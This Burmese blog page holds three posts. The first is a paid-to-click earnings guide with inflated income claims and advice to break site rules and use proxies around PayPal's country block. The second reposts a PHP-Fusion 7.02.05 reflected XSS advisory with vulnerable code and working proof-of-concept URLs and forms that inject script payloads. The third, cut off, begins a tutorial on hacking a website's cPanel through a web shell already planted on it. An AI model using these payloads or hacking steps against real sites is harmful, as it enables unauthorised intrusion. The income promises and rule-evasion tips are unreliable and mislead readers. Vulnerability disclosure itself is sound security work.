Blogger Widgets

Wednesday, October 9, 2013

အခုေျပာမွာကေတာ့ (PTC) အေၾကာင္း ပါ



PTC ဆိုက္ဆိုတာ ဘာ လဲဆိုတာကို သိေအာင္ ဒီမွာ ရွင္းျပမယ္၊ (PTC = Paid To Click)  ျမန္မာလိုဘာ သာ ျပန္ရင္ ကလစ္ႏွိပ္ရင္ ပိုက္ဆံေပးတယ္ဆိုတဲ့ သေဘာပါ။ PTC Website ေတြ စတင္ေပၚေပါက္ လာတာကေတာ့ 2007-2008 ကတည္းကပါ။ အြန္လိုင္း ေပၚမွာ Website ေတြအမ်ား ႀကီးရွိပါတယ္၊ အဲဒိ Website ကုမၼဏီေတြ က သူ တုိ႔ရဲ့ ထုတ္ကုန္ကို ကမၻာ တစ္၀ွမ္းမွာ ရွိတဲ့ လူေတြကို ေၾကာ္ျငာ ခ်င္ၾကပါတယ္၊ အလြယ္ကူဆံုးနဲ႔ အထိေရာက္ဆံုး  နည္းကေတာ့ ေန႔စဥ္ လူကုေ႗ ေပါင္းမ်ားစြာ က်င္လည္က်က္စားေနတဲ့ Online ေစ်း ကြက္မွာ ေၾကာ္ျငာ ျခင္းပါပဲ။ ဒါေပမဲ့ အြန္လိုင္းမွာလဲ သူတုိ႔အေနနဲ႔ သူတို႔ရဲ႕Product ကို သူတို႔ ကိုပိုင္ Website မွာ တင္ေရာင္းရံု ေၾကာ္ၿငာတင္ ရံုနဲ႔တင္ အဆင္မေျပၾကျပန္ဘူး။ျပသာနာက ဘယ္သူကသူတို႔ Website ကို ၀င္ၾကည့္မွာလဲ၊ Website  တင္တိုင္းလဲ လူ၀င္ၾကည့္တာမွမဟုတ္တာ၊ အဲ့ဒိေတာ့ ေၾကာ္ျငာ
နဲ႔ပက္သက္လို႔ ေျဖရွင္းခ်က္ေတြကိုရွာ ေတာ့   ေန႔စဥ္အြန္လိုင္းေပၚမွာ လူအသံုး အမ်ားဆံုး ျဖစ္တဲ့ Google, Yahoo, Bing, Facebook,  အျခားဆိုရွယ္ ဆိုက္တစ္ခ်ိဳ႕ ကို ေတြ႔သြားပါတယ္၊ အဲ႔ဒိ Social ဆိုက္တခ်ိဳ႕ရဲ့ Home Page မွာ သူတို႔ရဲ့ ေၾကာ္ျငာကို တင္ထားလိုက္ ရင္ သူတို႔ ရဲ့ ေၾကာ္ျငာ ကိုေန႔စဥ္ လူေပါင္း ကုေ႗နဲ႔ခ်ီျပီး ေတြ႕ေတာ့ မယ္ဆိုတဲ႔အၾကံနဲ႔  အဲ႔ဒိ  Social  ဆိုက္ေတြနဲ႕ စာခ်ဳပ္ေတြခ်ဳပ္ ေငြေတြ ေဒၚလာသန္းေပါင္းမ်ားစြာ ေပးျပီးသူတို႔ ရဲ့ေၾကာ္ျငာေတြကို စတင္ခဲ့ပါတယ္၊
ဒိလိုနဲ႔ပဲ နာမည္ႀကီးတဲ႔ Social ဆိုက္ေတြမွာ  ေၾကာ္ျငာေတြကို ပံုနဲ႔ တစ္မ်ိဳး စာနဲ႔တစ္မ်ိဳး ၀င္ေရာက္ေၾကာ္ျငာလာၾက ေတာ့ပါတယ္။ ဒါေပမဲ႔ ေၾကာ္ျငာတဲ့ ကုမၼဏီ  ေတြထဲက တစ္ခ်ိဳ႕ ကထင္သလာက္ခရီးမေပါက္ၾကပါဘူး၊ အဲ့ဒိလိုအပ္ခ်က္ကို ျဖည့္ဖို႔ အတြက္ PTC Website တစ္ခ်ိဳ႕ ေပၚထြက္လာပါတယ္၊ PTC ဆိုက္ေတြက ကုမၼဏီေတြကေန သင့္သင့္တဲ့ေငြပမာဏ နဲ႔ ေၾကာ္ျငာေတြကို လက္ခံပါတယ္၊  အဲ့ဒိ ကုမၼဏီကေၾကာ္ျငာေတြကို လူတစ္ေထာင္ၾကည့္ ရင္ $5 မွ $10 အထိ အခေက်းေငြယူျပီး သူတို႔ ၀က္ဆိုက္ေတြမွာ ေၾကာ္ျငာတင္ေပးၾကပါတယ္၊ ျပီးေတာ့သူတုိ႔က ေၾကာ္ျငာ ၾကည္႔မယ့္လူ (Member) ရွာပါတယ္၊ အဲ့ဒီ႔ ေေၾကာ္ျငာ ၾကည္႔မယ့္လူေတြကို အေယာက္ တစ္ေထာင္ကို $2 မွ $5 အထိေပးျပီး၀င္ၾကည့္ခိုင္းပါတယ္ ဒါေပမဲ့ ေၾကာ္ျငာ ၾကည့္တဲ့လူ (Member) ေတြက 5 စကၠန္႔မွ 10 စကၠန္႔ အထိအတိအက် ၾကည္႔ေပးရပါ တယ္ ၊  ဒီလိုနည္းနဲ႔ PTC ဆိုက္ေတြက အြန္လိုင္းေပၚမွာ ေနရာရလာၾကပါတယ္၊ ေၾကာ္ျငာ တဲ့သူကလည္း သူ႔ေၾကာ္ျငာကို  လူေတြေသခ်ာၾကည့္တဲ့အတြက္ ေက်နပ္သလို၊ ေၾကာ္ျငာ လက္ခံတဲ့ Website ကလည္း အျမတ္ရေတာ့ ေက်နပ္ၾကပါတယ္၊ အဲ ေၾကာ္ျငာ ၾကည့္ျပီး ပိုက္ဆံရွာတဲ့ ကၽြန္ေတာ္တို႔ (Member) အေနနဲ႔ ကလည္း ေက်နပ္မူရွိပါတယ္၊ ဒါက PTC Website ေတြရဲ့ ျဖစ္တည္မူပါပဲ။

သတိျပဳစရာ အခ်က္မ်ား

ကၽြန္ေတာ္ အထူးသတိေပးခ်င္ တာက အြန္လိုင္းေပၚမွာ PTC Website၁၅၀.၀၀၀  ေက်ာ္ေက်ာ္ ရွိပါတယ္ ။ ဒါေပမဲ့ တကယ္ပိုက္ဆံ ေပးတဲ့ဆိုက္က အေတာ့ကို နည္းပါတယ္။ ေနာက္ျပီး Internet ဆိုတာ  ယံုၾကည္စိတ္ခ်ရတ့ဲဆိုဒ္ အမွန္တကယ္ရိုးသားျပီး  ေျပာရင္ ေျပာတဲ့ အတိုင္းလုပ္ တဲ့ဆိုဒ္မ်ားအေတာ္ကိုရွားပါတယ္။  (Internet Is Full of Scam) ကၽြန္ေတာ္ ေျပာတာ ကို မယံုရင္လဲ ကို႔ဟာကို ေလ့လာၾကည့္ႏိုင္ပါတယ္။  တစ္ခ်ိဳ႕ အခြင္႔အေရး ရွာေနတဲ့သူေတြက PTC Website အတုေတြ ဖြင့္ တယ္။ ခင္ဗ်ား တုိ႔ဆီက ၀င္ေၾကး ေတာင္းလိမ့္မယ္ ျပီးရင္ ေျပာက္သြားေရာ၊ တစ္ခ်ိဳ႕ ပိုလို႔ေတာင္ဆိုးေသးတယ္၊ ခင္ဗ်ား ကို သံုး လေလာက္အလုပ္ခိုင္းျပီး ျပီးရင္ ခင္ဗ်ား ေငြလဲထုတ္ေရာ ခင္ဗ်ားကို ဘာ မွ အေၾကာင္း မျပန္ေတာ့ဘူး၊ အဲ့ဒီ့ေတာ့ ကၽြန္ေတာ္ အ ၾကံျပဳခ်င္တာက ကၽြန္ေတာ္ ေျပာ တဲ့ဆိုက္ေတြကို အရင္လုပ္ပါ။ အတိအက်ေလ့လာ ျပီး ႏွစ္အေတာ္ ၾကာျပသာနာ မရွိတဲ့ဆိုက္ေတြကို ကၽြန္ေတာ္ တင္ျပထား တာပါ၊ ဒါေပမဲ့ ကို႔ပါကို ေလ့လာခ်င္ရင္ လဲ သေဘာ ပါ သတိထား ပါလို႔ပဲ ေျပာ ပါရေစ။
ဒီမွာ ေနာက္ဆံုး အေနနဲ႔ ေျပာ ခ်င္တာက ေတာ့၊ PTC Website ေတြဟာ အစမွာ ေငြနည္းနည္း ပဲ၀င္ပါတယ္၊ Site တစ္ခု ကို တစ္လ $1.5 ေန $2 အထိပဲ ၀င္ပါတယ္၊ ဒါေပမဲ့  Site 5ခု မွ 10ခု  ေလာက္ ခ်ိတ္ထားႏိုင္ရင္ ေတာ့ တစ္လ $15 - $20 ၀န္းက်င္ရပါလိမ့္မယ္၊ ဒါေပမဲ့ တစ္ေန႔ကို မိနစ္ 20 ထက္ပိုျပီး အလုပ္လုပ္စရာ မလိုပါဘူး၊  PTC ဆိုက္ရဲ့ သေဘာက လြယ္ တယ္၊ လက္ေခ်ာင္းတစ္ေခ်ာင္း ရွိရင္ အလုပ္လုပ္လို႔ရ တယ္ ဒါေပမဲ့ ေငြျဖည္းျဖည္း ခ်င္းပဲရွာ လို႔႔ရမယ္။ တစ္လမွ $20 ထဲဆိုလို႔ စိတ္မညစ္သြားပါနဲ႔ ၊ ကၽြန္ေတာ္ တုိ႔ ဆိုက္ရဲ့ေငြရွာ ေဖြေရး အစီအစဥ္ ေတြရဲ့ ပထမအဆင့္ပဲရွိပါေသးတယ္၊ ၀င္ေငြ တိုးေအာင္ လုပ္တဲ့ နည္းေတြ အမ်ားၾကီးရွိပါတယ္။

မွတ္ခ်က္။    ။ ကၽြန္ေတာ္ PTC Website ေတြ နဲ႔ ပိုက္ဆံ ရွာေနတာ (၄) ႏွစ္ေက်ာ္ ေနပါၿပီ။

အခု ကၽြန္ေတာ့ PTC Website ေတြ ရဲ႕ ၀င္ေငြဟာ တစ္ရက္  $200 ($200/Day) ၀န္းက်င္ရွိပါတယ္။ တစ္ႏွစ္ ဆိုရင္ $80,000 ($80,000/year) ရွိပါတယ္။ အျမတ္ သီးသန္႔တြက္မည္ ဆိုပါက တစ္ႏွစ္ $60,000 ေက်ာ္ေက်ာ္ ရွိပါတယ္။ သည္အေျခအေန ေရာက္ဖို႔ ကၽြန္ေတာ့ အိပ္ကပ္ထဲက ပိုက္ဆံ တစ္ျပားမွ မဆိုက္ခဲ့ ပါဘူး။ ဆိုက္ခ်င္လဲ ဆိုက္လို႔မရခဲ့ဘူးေလ။ အဒီတုန္းက Paypal Account လဲ မဖြင့္တတ္ခဲ့ဘူးေလ။ ရွင္းရွင္း ေျပာရရင္ PTC Account ထဲမွာ ရွိတဲ့ ပိုက္ဆံ ေတာင္ ဘယ္လိုထုတ္ ရမယ္မွန္း သိခဲ့တာမဟုတ္ဘူး။ အခုျပန္ေတြးၾကည့္ရင္ေကာင္းတယ္လို႔ေတာင္ထင္ပါတယ္ ဘာေၾကာင့္လဲ ဆိုေတာ့ ပိုက္ဆံ ထုတ္မရေတာ့ ရတဲ့ ပိုက္ဆံကို PTC Site ေတြမွာ Referral (PTC ရဲ႕အသက္ ဟာ Referral လို႔ပဲ မွတ္ထာေပးပါ၊ Referral အေၾကာင္းကို ေအာက္မွာ ရွင္းျပပါမယ္)  ေတြ ၀ယ္ၿပီးရင္း၀ယ္ရင္းနဲ႔ပဲ အခု သည္ေလာက္ ၀င္ေငြ ရလာတာပါ။ ခင္ဗ်ား တို႔လည္း စအလုပ္လုပ္ျပီး တစ္ႏွစ္ေလာက္ ၾကာရင္ တစ္ႏွစ္ကို $8,000 ၀န္းက်င္ေလာက္ ရေနပါျပီ။ ပိုက္ဆံကို မထုတ္ ပဲ ႏွင့္ ဆက္ရင္းသြားရင္ေတာ့ ၃ ႏွစ္ေလာက္ေနရင္ အနည္းဆံုး တစ္ႏွစ္ $60,000 ေလာက္ ရမွာပါ။ အဲဒိ အခ်ိန္ေရာက္ လွ်င္ေတာ့ ထုတ္ျပီးရင္း ထုတ္ေပါ့ ။ ကၽြန္ေတာ့လည္း မေမ့ နဲ႔ေပါ့။
PTC Website ေတာ္ေတာ္ မ်ားမ်ား ကေတာ့ တစ္ပါတ္ တစ္ႀကီမ္ Cashout/Withdraw လုပ္လို႔ရပါ တယ္။
Minimum Cashout/Withdraw = $2
Maximum Cashout/Withdeaw = No
Cashout/Withdraw Period = one time/ week
Cashout/Withdraw Fees = 3% to 5%

PTC စည္းကမ္းခ်က္မ်ား

PTC Website တိုင္းမွာ သူ႔စည္းကမ္းနဲ႔သူရွိပါတယ္။၄င္းစည္းကမ္းမ်ားကိုမလိုက္နာရင္ေတာ့  ကိုယ့္အေကာင့္ကိုယာယီထိန္းသိမ္းျခင္းေသာ္လည္းေကာင္း၊အျမဲတမ္းထိန္းသိမ္းျခင္း ေသာ္လည္းေကာင္း  အေရးယူခံရႏိုင္ပါတယ္။ ဒီလိုမျဖစ္ရေအာင္ဒီလိုမျဖစ္ရေအာင္
စည္ကမ္းခ်က္မ်ားကို ေဖာ္ျပေပးသြားမယ္။

ကြန္ပ်ဴတာ တစ္လံုးအေကာင့္တစ္ခုႏႈန္း

PTCWebsite
 ေတြဟာအိမ္ကေနပိုက္ဆံရွာဖို႔လုပ္ေပးထားတဲ့အတြက္ကြန္ပ်ဴတာတစ္လံုးကို အေကာင့္တစ္ခုပဲလုပ္ခြင့္ေပးပါတယ္။ တစ္ခုထက္ပိုေသာ အေကာင့္မ်ားကို ယာယီပိတ္ပစ္ျခင္းေသာ္လည္းေကာင္း၊ အျမဲတမ္းပိတ္ပစ္ျခင္းေသာ္လည္းေကာင္း   လုပ္ခံရႏိုင္ပါတယ္။

အင္တာနက္ဆိုင္မ်ားမွ အသံုးျပဳျခင္း

စည္းကမ္းခ်က္မ်ားထဲမွာ အင္တာနက္ကေဖးဆိုင္မ်ားမွ အသံုးျပဳျခင္းကိုလက္မခံ ေသာ္လည္း တကယ္တမ္း သံုးလို႔ရပါတယ္။ အဒိ Computer ေတြမွာ Account မဖြင့္ထားဘူး ဆိုရင္ ရပါတယ္။

Proxy အသံုးျပဳျခင္း

login ဝင္ဖို႔ proxy သံုးႏိုင္ေသာ္လည္း ေၾကာ္ျငာၾကည္႔ဖို႔ အသံုးျပဳျခင္းလက္မခံပါ။
၄င္းဟာ ဘာကိုညႊန္းတာလဲဆိုေတာ့ ဥပမာ ကိုယ္ကျမန္မာႏိုင္ငံကေန  အေကာင့္လုပ္ ႏွိပ္ေနတယ္။  ႏိုင္ငံျခား ေရာက္သြားရင္လည္း   ဒီဆိုဒ္ကို အသံုးျပဳႏိုင္တဲ့သေဘာပါ။  ဒါေၾကာင့္လက္ခံတာပါ။  ဘာေၾကာင့္ေျပာတာလဲဆိုေတာ့   တစ္ႏိုင္ငံနဲ႔တစ္ႏိုင္ငံဟာ အိုင္ပီနံပါတ္မ်ားမတူသလို  အခ်ိန္မ်ားလည္း မတူညီၾကပါ။ ဒါေပမယ့္ ျမန္မာႏိုင္ငံ ကေန ပိုက္ဆံ ထုတ္ ၿပီဆိုရင္ေတာ့ proxy ေက်ာ္ကိုေက်ာ္ရမွာပါ။ ဘာေၾကာင့္လဲဆိုေတာ့ Cyber Banking ျဖစ္တဲ့ Paypal က ကၽြန္ေတာ္တို႔ ျမန္မာ IP address နဲ႔ ခြင့္မွ မျပဳတာ။

(ေအာက္မွာ Paypal Account ဖြင့္ နည္း ႏွင့္ မိမိ လက္ထဲ ပိုက္ဆံ ရေအာင္ထုတ္ နည္းကို ျပည့္ျပည့္ စံုစံု ေဖာ္ျပေပးသြားပါမည္။)

အလိုအေလ်ာက္ႏွိပ္ေသာ ေဆာ့ဖ္ဝဲအသံုးျပဳျခင္းကို လက္မခံျခင္း

အခ်ိဳ႕ေသာ ကိုယ္တိုင္ႏွိပ္ရမွာပ်င္းတဲ့သူမ်ားက  အလိုအေလ်ာက္ႏွိပ္ေပးတဲ့ ေဆာ့ဖ္ဝဲမ်ားကို  အသံုးျပဳၾကပါ တယ္။ ထိုသို႔အသံုးျပဳျခင္းကို PTC Website မ်ားက လက္မခံပါဘူး။ စစ္ေဆးေတြ႔ရွိက အေရးယူျခင္းခံရမွာပါ။

ေငြကို ဘယ္လိုထုတ္မလဲ

အြန္လိုင္းမွာ ေငြေခ်ျခင္း၊ ေငြလႊဲျခင္း၊ ေငြထုတ္ျခင္း စသည္မ်ားကို ျခားခံအေနနဲ႔ ေဆာင္ရြက္ေပးတဲ့Cyber Banking Website မ်ားရွိပါတယ္။ eg : Paypal, Payza or Alertpay, Neteller, Egopay, libertyreserve etc.....
ကၽြန္ေတာ္ ကေတာ့ Paypal ပဲ အသံုးျပဳပါ လို႔ အၾကံေပးခ်င္ပါတယ္။
(Paypal Account ဖြင္းနည္းကို ျပည့္ျပည့္စံုစံု Post တင္ေပးထားပါသည္။)

ေငြကို လက္ထဲေရာက္ေအာင္ ဘယ္လိုထုတ္မလဲ (မသိေသာသူမ်ား အတြက္သာ)

အရင္ ဦဆံုး Paypal မွာ Sign Up လုပ္လိုက္ပါ။ Cyber Banking အက်ိဳးေဆာင္ company မ်ားႏွင့္ ဆက္သြယ္ၿပီး ထုတ္ႏိုင္ပါတယ္။
ဥပမာ။    ။   www.shwemoney.com   တာရွိပါတယ္။ ျမန္မာ Website ပါOnline Banking System  အက်ိဳးေဆာင္Company ပါ။ ေငြလႊဲ ခ ကေတာ့ လႊဲေငြ၏ ၅% ပါ။
        Ph : 01-510-554
        Address : No (9), Shin Saw Pu Pagoda Street(near city mark) Sanchaung Township
        Email : support@shwemoney.com

Startup Now 

 မွက္ခ်က္။     ။signup လုပ္ခ်ိန္တြင္ Paypal email ေနရာတြင္ အဆင္ေျပတဲ့ email တစ္ခုခု (သို႔) ကြပ္လပ္ အတိုင္း ထားလို႔ရပါတယ္။ ၾကိဳက္တဲ့အခ်ိန္ ျပင္လို႔ ရပါတယ္။

1) Neobux



2) ProBux





4) BUXP








PTC Registering (Register ဘယ္္လိုလုပ္္မလဲ)

PTC registering  ကိNEOBUX ႏွင့္ ဥပမာေပး ျပီး ရွင္းျပ ပါ မယ္။
1) ေအာက္ကပံုကိုႏွိပ္လိုက္ပါ...



2)

3)
Paypal Email ေနရာမွာ ၾကိဳက္တဲ့ email ျဖည့္လို႔ ရပါတယ္။ အခ်ိန္မေရြး ေျပာင္းလို႔ ရတယ္။ Paypal Account လည္း ဖြင့္စရာမလိုေသးပါဘူး။ Cash out လုပ္တဲ့အခ်ိန္ေရာက္ မွ Paypal Account ဖြင့္လည္းရပါတယ္။ 
4)

အထပ္ပါပံုမ်ိဳးေတြ႔ရပါက Neobux က သင့္ရဲ့ အီးေမးလိပ္စာကို စာပို႔လိုက္ပါျပီ၊ အဲ့ဒီ့စာထဲမွာ Validation code ပါထည့္ေပးလိုက္တယ္၊ အဲ့ဒီ့ကုတ္ကိုကူးျပီး အထပ္ပါပံုရဲ့ ျမွား  ျပထားတဲ့ေနရာမွာထည့္ေပးရမယ္၊ (ပံုမွန္အားျဖင့္ Neobux မွေပးပို႔ေသာစာမ်ားဟာ သင့္အီးေမးရဲ့ Inbox ထဲမွာမရွိတတ္ပဲ Spam box ထဲေရာက္ေနတတ္ပါတယ္၊ Spam box မွာရွာပါ၊) ေအာပါပံုမွာဥပမာျပထားပါတယ္။


 

  


ဒါဆိုရင္ သင့္ရဲ့ neobux register လုပ္ၿခင္းအစီအစဥ္ ေအာင္ၿမင္စြာ ၿပီးဆံုးပါၿပီ 
ကဲ login သာ လုပ္လိုက္ ပါေတာ့......
Secondary Password က မသံုးလဲ ရပါတယ္။

Neobux ဝင္ေငြရေအာင္ ဘယ္လိုလုပ္မလဲ 

(1) Home page မွာ View Advertisements ကိုႏွိပ္ပါ။
(2) ေၾကာ္ျငာ Link ေတြ ကို click ပါ။ ( Red, Green , Orange)  စသည့္အေရာင္ေတြ ႏွင့္ ေတြရပါ လိမ့္ မယ္။ ကၽြန္ေတာ္ က ႏွိပ္ျပီးသားျဖစ္ေနလို႔ ပါ။
(3) အနီေရာင္ အစက္ေလး ကို ႏွိပ္လိုက္ပါ
(4) Close ကို Click လိုက္ပါ။ ဒါဆိုရင္ ေၾကာ္ျငာ တစ္ခု ၾကည္လို႔ ျပီး သြားပါျပီ။ 
ေၾကာ္ျငာအားလံုး ကုန္ေအာင္ ၾကည့္ လိုက္ပါ။
အားလံုးျပီးသြား ရင္ User name ေပၚေနတဲ့ ေနရာ မွာ click ႏွိပ္လိုက္ပါ။ ခင္ဗ်ား တို႔ရထားတဲ့ ပိုက္ဆံ ေတြ႕ ရပါလိမ့္မယ္။

NEOBUX ကို example ေပးျပီး ပါ ျပီ။ က်န္တာေတြလဲ ထိုနည္း၄င္း ပါဘဲ ။ PTC site ေတြအမ်ားၾကီးပါ ၾကိဳက္တာကို စမ္းၾကည့္ ပါ။ But register မလုပ္ခင္ေတာ့ Forum တို႔ Payment Proof တို႕ကို အရင္ၾကည့္ပါ....... Good luck EVERYBODY

Monday, May 27, 2013

PHP-Fusion 7.02.05 XSS


https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcSHtyiEFujDPkerw0g-JWdVmK35nPnYhLvBlkALg4WY_8dujydcBg 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.


http://www.php-fusion.co.uk/news.php

http://sourceforge.net/projects/php-fusion/



Vulnerable is version 7.02.05 and possibly older versions.


New, patched version 7.02.06 available here:


http://www.php-fusion.co.uk/news.php?readmore=569

http://www.php-fusion.co.uk/downloads.ph...oad_id=264


Reflected XSS in "forum/viewthread.php"

Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread

Php script "forum/viewthread.php" line 361:


Code:
// highlight jQuery plugin
    if (isset($_GET['highlight'])) {
        $words = explode(" ", urldecode($_GET['highlight']));
        $higlight = ""; $i = 1; $c_words = count($words);
        foreach ($words as $hlight) {
            $higlight .= "'".$hlight."'";
            $higlight .= ($i < $c_words ? "," : "");
            $i++;
        }
        add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
        $highlight_js .=   "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
Test (parameter "thread_id" must be valid):

http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*

Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on

Php script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
    echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Test:
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
Similar problem is related to variable "$user_types", only in this case admin
access level is needed:

Php script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
    echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
    echo "".$locale['434'].":</label> <select name='msg_to_group' class='textbox'>\n".$user_types."</select>\n";

Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on

Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n"; }
Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+

Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on

Php script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
    if ($_GET['error'] == 1) {
        $message = $locale['413'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
if (isset($_GET['status'])) {
    if ($_GET['status'] == "sn") {
        $message = $locale['410'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+

Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on

Php script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
    if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
        if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
    }
}
...
for ($i=0;$i < count($panel_list);$i++) {
        echo "<option".($panel_filename == $panel_list[$i] ?
            " selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Test (parameter "aid" needs to be valid):
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges

Php script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";

Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on

Php script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";

Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+

Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on

Php script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
        if ($error == 1) {
            $errorMessage = $locale['460'];
        } elseif ($error == 2) {
            $errorMessage = $locale['461'];
        }
        if ($errorMessage) { echo "<div id='close-message'>
          <div class='admin-message'>".$errorMessage."</div></div>\n"; }

The same vulnerability exists in four different admin scripts:

1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges

Php script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Test (parameter "aid" needs to be valid):

Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Website တစ္ခုရဲ ့ Cpanel ကို အလြယ္ဆုံးနည္းနဲ ့ Hack မယ္

https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTpvpLk9QKQ7RnxtT1UyXZgokwqiubRmGXeryZiGoOu1Gr-zDK6



ခုနည္းကို သုံးမယ္ဆုိရင္ေတာ့ အရင္ဆုံး မိမိ Hack
လုပ္ခ်င္တဲ့ ဆုိဒ္မွာ Shell တင္ထားဖုိ ့လုိပါတယ္။
ျပီးသြားရင္ Shell မွ ပတ္လမ္းတစ္ခုၾကည့္ရပါမယ္..
. အဲ့မွာ /home/user/public_html/
ဆုိတာရွိပါတယ္ ..
 ေအာက္ပုံလုိမ်ဳိးေပ့ါ..

http://img855.imageshack.us/img855/8901/lgtce2a.png
ဒီမွာေတာ့ /home/user/Public_html/ အစား /home/fortun03/public_html/ လုိ ့ျဖစ္ေနပါတယ္..
ဆုိလုိခ်င္တာကေတာ့ /user/ ဆုိတဲ့ေနရာမွာ website Db List name ျဖစ္ေနမွာပါ..(တစ္ဆုိဒ္နဲ ့တစ္ဆုိဒ္ မတူဘူးေပ့ါဗ်ာ။) ဒီေတာ့ အဲ့ /user/ ကုိ ကလစ္နုိပ္ရပါမယ္။ ဒီေတာ့ /home/user/ လုိ ့ျဖစ္သြားပါမယ္။
